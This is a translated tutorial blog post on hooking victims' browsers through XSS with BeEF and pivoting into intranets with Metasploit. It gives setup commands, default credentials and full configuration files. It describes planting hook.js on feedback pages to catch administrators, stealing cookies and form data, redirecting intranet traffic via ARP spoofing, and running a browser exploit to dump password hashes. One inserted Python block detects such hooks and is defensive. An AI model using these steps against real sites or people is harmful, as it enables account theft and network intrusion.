Intranet penetration 1: Use the Xss vulnerability to access the Intranet

Source: Internet
Author: User
Tags: kali linux


0x01 Primer

BeEF is currently the most popular browser attack platform in Europe and America. Its full name is The Browser Exploitation Framework Project. Through an ordinary XSS vulnerability, BeEF injects a JavaScript file (hook.js) that takes control of the target host's browser; through that browser it collects detailed information about the host and can go on to scan the intranet. Combined with Metasploit, it is a killer tool for intranet penetration.

0x02 Installation

BeEF is not installed in Kali Linux by default; you have to install it yourself.

apt-get update
apt-get install beef-xss

0x03 Getting started

0x03.1 Start

Main directory:

/usr/share/beef-xss

cd /usr/share/beef-xss
./beef

Admin panel: http://127.0.0.1:3000/ui/panel

Account / password:

beef / beef

Demo page: http://<BeEF host IP>:3000/demos/butcher/index.html

Test that the two hosts can reach each other over the network:

Open the BeEF demo page from the target browser.

The demo page embeds hook.js, so the browser that loads it is hooked.

0x04 Planting the hook script:

Add a script tag to a normal page so that it loads the malicious script (hook.js).

In a real penetration test (a public IP address is required), how do we get victims to open the page with hook.js embedded?

Website feedback pages and report/complaint pages are candidates. Case: XSS used to get into the back end of the Baidu Complaint Center.

Of course, that author used an XSS platform rather than BeEF. With BeEF, you can not only obtain the back-end administrator's cookie, but also, together with Metasploit, use the administrator's browser as a stepping stone into the company intranet.

Online Browsers -> right-click -> Use As Proxy.

Combined with ARP spoofing and a man-in-the-middle attack, redirecting every HTTP request in the internal network is basically... (insert a knowing smile here).

The BeEF console shows a host coming online (it feels like playing with Gray Pigeon back in the day: "online" =.=).

Through the browser we can see a lot of information about the target host:

Browser information: name, version, UA string, platform, window size
Plugins: Flash, VBScript, WebSockets, QuickTime, ...
API info
Cookies
OS info
Date
Hardware info: CPU (32/64-bit), screen resolution, touch screen support
and so on.

Tested with Firefox.

BeEF function modules

Common functions and modules

Browser: get browser information
  Hooked Domain -> Get Cookie: retrieve the client's cookies; run the command and the cookie is displayed on the right
  Hooked Domain -> Get Form Values: collect the data submitted in forms on the page, e.g. intercepted bank card details or the username and password entered on a registration page
  Hooked Domain -> Redirect Browser: redirect the browser

After it runs, the target browser is redirected to bobao.360.cn whatever site it was visiting. In a real penetration test, ARP spoofing on the intranet would redirect all HTTP traffic on the intranet to the page embedding the hook script... (insert a wicked grin here).
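The hook tag planted in 0x04 and the redirection just described both leave traces a defender can look for. The following is an added example, not code from the original post or from the BeEF project: it flags script tags loaded from a host outside a site's allowlist, and proxy/access-log lines carrying the BeEF defaults from the config.yaml on this page (hook.js, BEEFHOOK, BEEFSESSION, /ui/panel). The sample HTML and log lines are constructed, and 192.0.2.10 is a documentation address standing in for the hooking host.

```python
# Added example (not from the original post or the BeEF project): spotting the hook
# from the defender's side. Markers are the defaults from this page's config.yaml;
# an operator can rename them, so a match is a lead, not proof.
import re
from urllib.parse import urlsplit

SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']?([^"\'\s>]+)', re.IGNORECASE)
# config.yaml defaults: hook_file, hook_session_name, session_cookie_name, panel_path
BEEF_MARKERS = ("/hook.js", "BEEFHOOK", "BEEFSESSION", "/ui/panel")

def find_foreign_scripts(html, trusted_hosts):
    """Return script src URLs served from hosts outside the site's allowlist;
    a hook tag injected via XSS shows up here even if hook.js was renamed."""
    hits = []
    for src in SCRIPT_SRC.findall(html):
        host = urlsplit(src).hostname      # None for same-origin relative paths
        if host is not None and host not in trusted_hosts:
            hits.append(src)
    return hits

def flag_beef_requests(log_lines):
    """Return (line_no, marker) for proxy/access-log lines carrying a BeEF default."""
    flagged = []
    for n, line in enumerate(log_lines, 1):
        for marker in BEEF_MARKERS:
            if marker in line:
                flagged.append((n, marker))
                break
    return flagged

# Constructed sample page: a feedback form with a hook tag injected through XSS
# (192.0.2.10 is a documentation address standing in for the attacker's host)
SAMPLE_HTML = """<html><body>
<script src="/static/app.js"></script>
<form action="/feedback"><textarea name="msg"></textarea></form>
<script src="http://192.0.2.10:3000/hook.js"></script>
</body></html>"""

# Constructed proxy-log lines: one client fetches hook.js and then starts polling
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00] "GET http://www.example.com/index.html HTTP/1.1" 200',
    '10.0.0.5 - - [01/Jan/2024:10:00:01] "GET http://192.0.2.10:3000/hook.js HTTP/1.1" 200',
    '10.0.0.5 - - [01/Jan/2024:10:00:02] "GET http://192.0.2.10:3000/dh?BEEFHOOK=c0ns7ruc7ed HTTP/1.1" 200',
    '10.0.0.7 - - [01/Jan/2024:10:00:03] "GET http://www.example.com/logo.png HTTP/1.1" 200',
]

if __name__ == "__main__":
    print(find_foreign_scripts(SAMPLE_HTML, {"www.example.com"}))
    print(flag_beef_requests(SAMPLE_LOG))
```

A Content-Security-Policy that restricts script-src to the allowlisted hosts stops the injected tag from loading at all; the scan above is for finding pages and clients where that control is missing.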

Chrome Extensions
Debug: test HTTP requests
Exploits: attack the host by exploiting browser vulnerabilities
Host: get victim host information
Metasploit: penetration with Metasploit, which is also the focus of this article
Network: DoSer, ping, DNS enumeration, port scanning, etc.
Social Engineering: social engineering module

0x05 Integration with Metasploit

BeEF configuration file:

/usr/share/beef-xss/config.yaml

In config.yaml, change

    extension:
        metasploit:
            enable: false

to

    extension:
        metasploit:
            enable: true
The full config.yaml with the Metasploit extension enabled:

# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
    version: '0.4.4.5-alpha'
    debug: false
    restrictions:
        # subnet of browser ip addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
        # subnet of browser ip addresses that can connect to the UI
        # permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
        # It's not advised to decrease it with tons of hooked browsers (more than 50),
        # because it might impact performance. Also, enable WebSockets is generally better.
        xhr_poll_timeout: 5000
        # if running behind a nat set the public ip address here
        #public: ""
        #public_port: "" # port setting is experimental
        # DNS
        dns_host: "localhost"
        dns_port: 53
        panel_path: "/ui/panel"
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"
        # Allow one or multiple domains to access the RESTful API using CORS
        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"
        # Prefer WebSockets over XHR-polling when possible.
        websocket:
          enable: false
          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
          port: 61985 # WS: good success rate through proxies
          secure_port: 61986 # WSSecure
          ws_poll_timeout: 1000 # poll BeEF every second
        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" #supported: apache, iis
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"
    database:
        # For information on using other databases please read the
        # README.databases file
        # supported DBs: sqlite, mysql, postgres
        # NOTE: you must change the Gemfile adding a gem require line like:
        #   gem "dm-postgres-adapter"
        # or
        #   gem "dm-mysql-adapter"
        # if you want to switch drivers from sqlite to postgres (or mysql).
        # Finally, run a 'bundle install' command and start BeEF.
        driver: "sqlite"
        # db_file is only used for sqlite
        db_file: "db/beef.db"
        # db connection information is only used for mysql/postgres
        db_host: "localhost"
        db_port: 5432
        db_name: "beef"
        db_user: "beef"
        db_passwd: "beef123"
        db_encoding: "UTF-8"
    # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
    credentials:
        user:   "beef"
        passwd: "beef"
    # Autorun modules as soon the browser is hooked.
    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
    autorun:
        enable: true
        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
        allow_user_notify: true
    crypto_default_value_length: 80
    # Enable client-side debugging
    client:
        debug: false
    # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
        metasploit:
            enable: true
        social_engineering:
            enable: true
        evasion:
            enable: false
        console:
            shell:
                enable: false
        ipec:
            enable: true

The Metasploit extension's own configuration file:

# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "172.16.244.129"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            ssl: false
            ssl_version: 'SSLv3'
            ssl_verify: true
            callback_host: "172.16.244.129"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [
              {os: 'osx', path: '/opt/local/msf/'},
              {os: 'livecd', path: '/opt/metasploit-framework/'},
              {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
              {os: 'bt5', path: '/opt/framework3/msf3/'},
              {os: 'backbox', path: '/opt/metasploit3/msf3/'},
              {os: 'win', path: 'c:\\metasploit-framework\\'},
              {os: 'custom', path: '/usr/share/metasploit-framework/'}
            ]

Set the host and callback_host parameters to the IP address of the BeEF host.

Restart the postgresql and metasploit services:

service postgresql restart && service metasploit restart

msfconsole    # start Metasploit
msf > load msgrpc ServerHost=172.16.244.129 Pass=abc123

Restart BeEF

When BeEF starts, it reports that 246 Metasploit exploits have been loaded. An MSF updated to the latest version should have 500 or 600.

Enter the BeEF console (inexplicably it shows 245 =.=!)

use exploit/windows/browser/ie_execcommand_uaf
show options
set srvhost 172.16.244.129
exploit    # or: run

The target is forcibly redirected to the URL the listener is serving.

MSF is listening for the vulnerability (but it seems the XP installed in the virtual machine has already been patched for it, so no session is generated).

If XP is unpatched, the vulnerability exists and a session is generated:

sessions -i 1

screenshot    # capture the victim's screen to a local file
sysinfo       # view system information
hashdump      # dump the user hashes of the target host
